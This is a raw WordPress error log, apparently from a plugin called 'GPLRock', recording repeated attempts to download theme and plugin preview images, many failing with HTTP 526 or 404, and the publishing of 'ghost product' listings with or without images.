https://meldwp.com/wp-content/uploads/cascade---personal-vcard-wordpress-theme-13627.webp for product cascade-personal-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:25:50 UTC] GPLRock WARNING: Image download failed for product cascade-personal-vcard-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cascade---personal-vcard-wordpress-theme-13627.webp [05-Apr-2026 06:25:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cascade-personal-vcard-wordpress-theme [05-Apr-2026 06:25:50 UTC] GPLRock: Image download failed for product hayley-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:53 UTC] GPLRock: Image download failed for product hayley-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hayley---personal-cvresume-wordpress-theme-2206.webp for product hayley-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:25:55 UTC] GPLRock: Image download failed for product hayley-personal-cvresume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:57 UTC] GPLRock: Image download failed for product hayley-personal-cvresume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:25:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hayley---personal-cvresume-wordpress-theme-2206.webp for product hayley-personal-cvresume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:25:59 UTC] GPLRock WARNING: Image download failed for product hayley-personal-cvresume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hayley---personal-cvresume-wordpress-theme-2206.webp [05-Apr-2026 06:25:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hayley-personal-cvresume-wordpress-theme [05-Apr-2026 06:25:59 UTC] GPLRock: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:35:59 UTC] GPLRock: Image download failed for product waveride-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:01 UTC] GPLRock: Image download failed for product waveride-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/waveride---surfing-and-water-sports-wordpress-theme-15222.webp for product waveride-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:36:04 UTC] GPLRock: Image download failed for product waveride-surfing-and-water-sports-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:06 UTC] GPLRock: Image download failed for product waveride-surfing-and-water-sports-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/waveride---surfing-and-water-sports-wordpress-theme-15222.webp for product waveride-surfing-and-water-sports-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:36:08 UTC] GPLRock WARNING: Image download failed for product waveride-surfing-and-water-sports-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/waveride---surfing-and-water-sports-wordpress-theme-15222.webp [05-Apr-2026 06:36:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: waveride-surfing-and-water-sports-wordpress-theme [05-Apr-2026 06:36:08 UTC] GPLRock: Image downloaded successfully for product nftlabio-nft-marketplace-affiliate-elementor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3653c96.webp [05-Apr-2026 06:36:08 UTC] GPLRock: Using pre-downloaded image for product nftlabio-nft-marketplace-affiliate-elementor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3653c96.webp [05-Apr-2026 06:36:09 UTC] GPLRock: Ghost product published with image - Product ID: nftlabio-nft-marketplace-affiliate-elementor-wordpress-theme [05-Apr-2026 06:36:09 UTC] GPLRock: Image download failed for product nanovi-resort-and-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:11 UTC] GPLRock: Image download failed for product nanovi-resort-and-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nanovi---resort-and-hotel-wordpress-theme-3234.webp for product nanovi-resort-and-hotel-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:36:13 UTC] GPLRock: Image download failed for product nanovi-resort-and-hotel-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:36:15 UTC] GPLRock: Image download failed for product nanovi-resort-and-hotel-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:46:17 UTC] GPLRock: Image downloaded successfully for product bradco-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4bcf1b7.webp [05-Apr-2026 06:46:17 UTC] GPLRock: Using pre-downloaded image for product bradco-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4bcf1b7.webp [05-Apr-2026 06:46:17 UTC] GPLRock: Ghost product published with image - Product ID: bradco-business-elementor-template-kit [05-Apr-2026 06:46:18 UTC] GPLRock: Image downloaded successfully for product boxernia-boxing-school-martial-arts-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87152a61.jpg [05-Apr-2026 06:46:19 UTC] GPLRock: Using pre-downloaded image for product boxernia-boxing-school-martial-arts-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87152a61.jpg [05-Apr-2026 06:46:19 UTC] GPLRock: Ghost product published with image - Product ID: boxernia-boxing-school-martial-arts-elementor-template-kit [05-Apr-2026 06:46:20 UTC] GPLRock: Image downloaded successfully for product boston-school-university-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2efb9901.webp [05-Apr-2026 06:46:20 UTC] GPLRock: Using pre-downloaded image for product boston-school-university-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2efb9901.webp [05-Apr-2026 06:46:20 UTC] GPLRock: Ghost product published with image - Product ID: boston-school-university-elementor-template-kit [05-Apr-2026 06:46:21 UTC] GPLRock: Image downloaded successfully for product booyah-creative-artist-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e12732e9.webp [05-Apr-2026 06:46:21 UTC] GPLRock: Using pre-downloaded image for product booyah-creative-artist-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e12732e9.webp [05-Apr-2026 06:46:21 UTC] GPLRock: Ghost product published with image - Product ID: booyah-creative-artist-portfolio-elementor-template-kit [05-Apr-2026 06:46:23 UTC] GPLRock: Image downloaded successfully for product booster-proxy-app-vpn-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8adadd6.webp [05-Apr-2026 06:46:23 UTC] GPLRock: Using pre-downloaded image for product booster-proxy-app-vpn-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f8adadd6.webp [05-Apr-2026 06:46:23 UTC] GPLRock: Ghost product published with image - Product ID: booster-proxy-app-vpn-service-elementor-template-kit [05-Apr-2026 06:46:24 UTC] GPLRock: Image downloaded successfully for product boos-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d62718c8.webp [05-Apr-2026 06:46:24 UTC] GPLRock: Using pre-downloaded image for product boos-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d62718c8.webp [05-Apr-2026 06:46:24 UTC] GPLRock: Ghost product published with image - Product ID: boos-business-elementor-template-kit [05-Apr-2026 06:46:26 UTC] GPLRock: Image downloaded successfully for product bookup-book-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94a947f7.webp [05-Apr-2026 06:46:26 UTC] GPLRock: Using pre-downloaded image for product bookup-book-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94a947f7.webp [05-Apr-2026 06:46:26 UTC] GPLRock: Ghost product published with image - Product ID: bookup-book-store-elementor-template-kit [05-Apr-2026 06:46:27 UTC] GPLRock: Image downloaded successfully for product bookflare-modern-education-online-learning-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c07133cb.jpg [05-Apr-2026 06:46:27 UTC] GPLRock: Using pre-downloaded image for product bookflare-modern-education-online-learning-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c07133cb.jpg [05-Apr-2026 06:46:27 UTC] GPLRock: Ghost product published with image - Product ID: bookflare-modern-education-online-learning-elementor-template-kit [05-Apr-2026 06:46:29 UTC] GPLRock: Image downloaded successfully for product bookchimp-online-book-store-website-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8717080b.webp [05-Apr-2026 06:46:29 UTC] GPLRock: Using pre-downloaded image for product bookchimp-online-book-store-website-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8717080b.webp [05-Apr-2026 06:46:29 UTC] GPLRock: Ghost product published with image - Product ID: bookchimp-online-book-store-website-elementor-template-kit [05-Apr-2026 06:46:30 UTC] GPLRock: Image downloaded successfully for product bookarazi-author-publisher-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b473149.webp [05-Apr-2026 06:46:30 UTC] GPLRock: Using pre-downloaded image for product bookarazi-author-publisher-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b473149.webp [05-Apr-2026 06:46:30 UTC] GPLRock: Ghost product published with image - Product ID: bookarazi-author-publisher-elementor-template-kit [05-Apr-2026 06:47:23 UTC] GPLRock: Image downloaded successfully for product smart-sections-theme-builder-wpbakery-page-builder-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fb5ac9c.jpg [05-Apr-2026 06:47:23 UTC] GPLRock: Using pre-downloaded image for product smart-sections-theme-builder-wpbakery-page-builder-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1fb5ac9c.jpg [05-Apr-2026 06:47:23 UTC] GPLRock: Ghost product published with image - Product ID: smart-sections-theme-builder-wpbakery-page-builder-addon [05-Apr-2026 06:47:24 UTC] GPLRock: Image downloaded successfully for product jumbo-a-3-in-1-full-screen-menu-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e33a3481.jpg [05-Apr-2026 06:47:24 UTC] GPLRock: Using pre-downloaded image for product jumbo-a-3-in-1-full-screen-menu-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e33a3481.jpg [05-Apr-2026 06:47:24 UTC] GPLRock: Ghost product published with image - Product ID: jumbo-a-3-in-1-full-screen-menu-for-wordpress [05-Apr-2026 06:47:26 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-notification-bar-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb2edb17.jpg [05-Apr-2026 06:47:26 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-notification-bar-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb2edb17.jpg [05-Apr-2026 06:47:26 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-notification-bar-pro [05-Apr-2026 06:47:29 UTC] GPLRock: Image download failed for product woocommerce-product-search (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:47:33 UTC] GPLRock: Image download failed for product woocommerce-product-search (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:47:37 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/01/WooCommerce-Product-Search.jpg for product woocommerce-product-search after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 06:47:39 UTC] GPLRock: Image download failed for product woocommerce-product-search (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:47:43 UTC] GPLRock: Image download failed for product woocommerce-product-search (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:47:47 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/01/WooCommerce-Product-Search.jpg for product woocommerce-product-search after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 06:47:47 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-search. URL: https://www.gplrock.com/wp-content/uploads/2021/01/WooCommerce-Product-Search.jpg [05-Apr-2026 06:47:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-search [05-Apr-2026 06:47:48 UTC] GPLRock: Image downloaded successfully for product geodirectory-review-rating-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84b90275.jpg [05-Apr-2026 06:47:48 UTC] GPLRock: Using pre-downloaded image for product geodirectory-review-rating-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84b90275.jpg [05-Apr-2026 06:47:48 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-review-rating-manager [05-Apr-2026 06:47:49 UTC] GPLRock: Image downloaded successfully for product gravityview-inline-edit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e188608.jpg [05-Apr-2026 06:47:49 UTC] GPLRock: Using pre-downloaded image for product gravityview-inline-edit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5e188608.jpg [05-Apr-2026 06:47:49 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-inline-edit [05-Apr-2026 06:47:50 UTC] GPLRock: Image downloaded successfully for product slick-menu-responsive-wordpress-vertical-menu (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-245edcbe.jpg [05-Apr-2026 06:47:50 UTC] GPLRock: Using pre-downloaded image for product slick-menu-responsive-wordpress-vertical-menu: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-245edcbe.jpg [05-Apr-2026 06:47:50 UTC] GPLRock: Ghost product published with image - Product ID: slick-menu-responsive-wordpress-vertical-menu [05-Apr-2026 06:47:52 UTC] GPLRock: Image downloaded successfully for product css-igniter-brittany-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ae9728f.jpg [05-Apr-2026 06:47:52 UTC] GPLRock: Using pre-downloaded image for product css-igniter-brittany-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5ae9728f.jpg [05-Apr-2026 06:47:52 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-brittany-wordpress-theme [05-Apr-2026 06:47:53 UTC] GPLRock: Image downloaded successfully for product mythemeshop-woocart-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfbfea03.jpg [05-Apr-2026 06:47:53 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-woocart-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cfbfea03.jpg [05-Apr-2026 06:47:53 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-woocart-wordpress-theme [05-Apr-2026 06:47:55 UTC] GPLRock: Image downloaded successfully for product yith-cost-of-goods-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ad6c57f.jpg [05-Apr-2026 06:47:55 UTC] GPLRock: Using pre-downloaded image for product yith-cost-of-goods-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8ad6c57f.jpg [05-Apr-2026 06:47:55 UTC] GPLRock: Ghost product published with image - Product ID: yith-cost-of-goods-for-woocommerce-premium [05-Apr-2026 06:48:35 UTC] GPLRock: Image download failed for product fdoctor-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:37 UTC] GPLRock: Image download failed for product fdoctor-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fdoctor--health--medical-wordpress-theme-25834.webp for product fdoctor-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:48:39 UTC] GPLRock: Image download failed for product fdoctor-health-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:41 UTC] GPLRock: Image download failed for product fdoctor-health-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fdoctor--health--medical-wordpress-theme-25834.webp for product fdoctor-health-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:48:43 UTC] GPLRock WARNING: Image download failed for product fdoctor-health-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fdoctor--health--medical-wordpress-theme-25834.webp [05-Apr-2026 06:48:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fdoctor-health-medical-wordpress-theme [05-Apr-2026 06:48:43 UTC] GPLRock: Image downloaded successfully for product rocland-real-estate-group-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3d92c3e.webp [05-Apr-2026 06:48:43 UTC] GPLRock: Using pre-downloaded image for product rocland-real-estate-group-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3d92c3e.webp [05-Apr-2026 06:48:43 UTC] GPLRock: Ghost product published with image - Product ID: rocland-real-estate-group-wordpress-theme [05-Apr-2026 06:48:44 UTC] GPLRock: Image download failed for product solaz-an-elegant-hotel-lodge-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:46 UTC] GPLRock: Image download failed for product solaz-an-elegant-hotel-lodge-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solaz---an-elegant-hotel--lodge-wordpress-theme-8130.webp for product solaz-an-elegant-hotel-lodge-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:48:48 UTC] GPLRock: Image download failed for product solaz-an-elegant-hotel-lodge-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:50 UTC] GPLRock: Image download failed for product solaz-an-elegant-hotel-lodge-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solaz---an-elegant-hotel--lodge-wordpress-theme-8130.webp for product solaz-an-elegant-hotel-lodge-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:48:52 UTC] GPLRock WARNING: Image download failed for product solaz-an-elegant-hotel-lodge-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/solaz---an-elegant-hotel--lodge-wordpress-theme-8130.webp [05-Apr-2026 06:48:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: solaz-an-elegant-hotel-lodge-wordpress-theme [05-Apr-2026 06:48:52 UTC] GPLRock: Image download failed for product whizz-photography-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:54 UTC] GPLRock: Image download failed for product whizz-photography-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whizz-photography-wordpress-5952.webp for product whizz-photography-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:48:57 UTC] GPLRock: Image download failed for product whizz-photography-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:48:59 UTC] GPLRock: Image download failed for product whizz-photography-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/whizz-photography-wordpress-5952.webp for product whizz-photography-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:01 UTC] GPLRock WARNING: Image download failed for product whizz-photography-wordpress. URL: https://meldwp.com/wp-content/uploads/whizz-photography-wordpress-5952.webp [05-Apr-2026 06:49:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: whizz-photography-wordpress [05-Apr-2026 06:49:01 UTC] GPLRock: Image download failed for product costica-skincare-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:03 UTC] GPLRock: Image download failed for product costica-skincare-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/costica---skincare--cosmetics-shop-wordpress-theme-798.webp for product costica-skincare-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:05 UTC] GPLRock: Image download failed for product costica-skincare-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:07 UTC] GPLRock: Image download failed for product costica-skincare-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/costica---skincare--cosmetics-shop-wordpress-theme-798.webp for product costica-skincare-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:10 UTC] GPLRock WARNING: Image download failed for product costica-skincare-cosmetics-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/costica---skincare--cosmetics-shop-wordpress-theme-798.webp [05-Apr-2026 06:49:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: costica-skincare-cosmetics-shop-wordpress-theme [05-Apr-2026 06:49:10 UTC] GPLRock: Image download failed for product sultin-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:12 UTC] GPLRock: Image download failed for product sultin-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sultin---consulting-wordpress-theme-30237.webp for product sultin-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:14 UTC] GPLRock: Image download failed for product sultin-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:16 UTC] GPLRock: Image download failed for product sultin-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sultin---consulting-wordpress-theme-30237.webp for product sultin-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:18 UTC] GPLRock WARNING: Image download failed for product sultin-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sultin---consulting-wordpress-theme-30237.webp [05-Apr-2026 06:49:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sultin-consulting-wordpress-theme [05-Apr-2026 06:49:18 UTC] GPLRock: Image download failed for product cryptlight-ico-nft-ai-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:21 UTC] GPLRock: Image download failed for product cryptlight-ico-nft-ai-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptlight---ico-nft-ai-landing-page-wordpress-theme-27798.webp for product cryptlight-ico-nft-ai-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:23 UTC] GPLRock: Image download failed for product cryptlight-ico-nft-ai-landing-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:25 UTC] GPLRock: Image download failed for product cryptlight-ico-nft-ai-landing-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptlight---ico-nft-ai-landing-page-wordpress-theme-27798.webp for product cryptlight-ico-nft-ai-landing-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:27 UTC] GPLRock WARNING: Image download failed for product cryptlight-ico-nft-ai-landing-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cryptlight---ico-nft-ai-landing-page-wordpress-theme-27798.webp [05-Apr-2026 06:49:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptlight-ico-nft-ai-landing-page-wordpress-theme [05-Apr-2026 06:49:27 UTC] GPLRock: Image download failed for product structure-construction-industrial-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:29 UTC] GPLRock: Image download failed for product structure-construction-industrial-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/structure---construction-industrial-factory-wordpress-theme-10795.webp for product structure-construction-industrial-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:31 UTC] GPLRock: Image download failed for product structure-construction-industrial-factory-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:34 UTC] GPLRock: Image download failed for product structure-construction-industrial-factory-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/structure---construction-industrial-factory-wordpress-theme-10795.webp for product structure-construction-industrial-factory-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:36 UTC] GPLRock WARNING: Image download failed for product structure-construction-industrial-factory-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/structure---construction-industrial-factory-wordpress-theme-10795.webp [05-Apr-2026 06:49:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: structure-construction-industrial-factory-wordpress-theme [05-Apr-2026 06:49:36 UTC] GPLRock: Image download failed for product onova-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:38 UTC] GPLRock: Image download failed for product onova-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onova---it-solutions--services-wordpress-theme-24767.webp for product onova-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:40 UTC] GPLRock: Image download failed for product onova-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:42 UTC] GPLRock: Image download failed for product onova-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:49:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onova---it-solutions--services-wordpress-theme-24767.webp for product onova-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:49:44 UTC] GPLRock WARNING: Image download failed for product onova-it-solutions-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/onova---it-solutions--services-wordpress-theme-24767.webp [05-Apr-2026 06:49:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onova-it-solutions-services-wordpress-theme [05-Apr-2026 06:49:44 UTC] GPLRock: Image download failed for product konstructo-construction-and-architecture-wordpress-theme 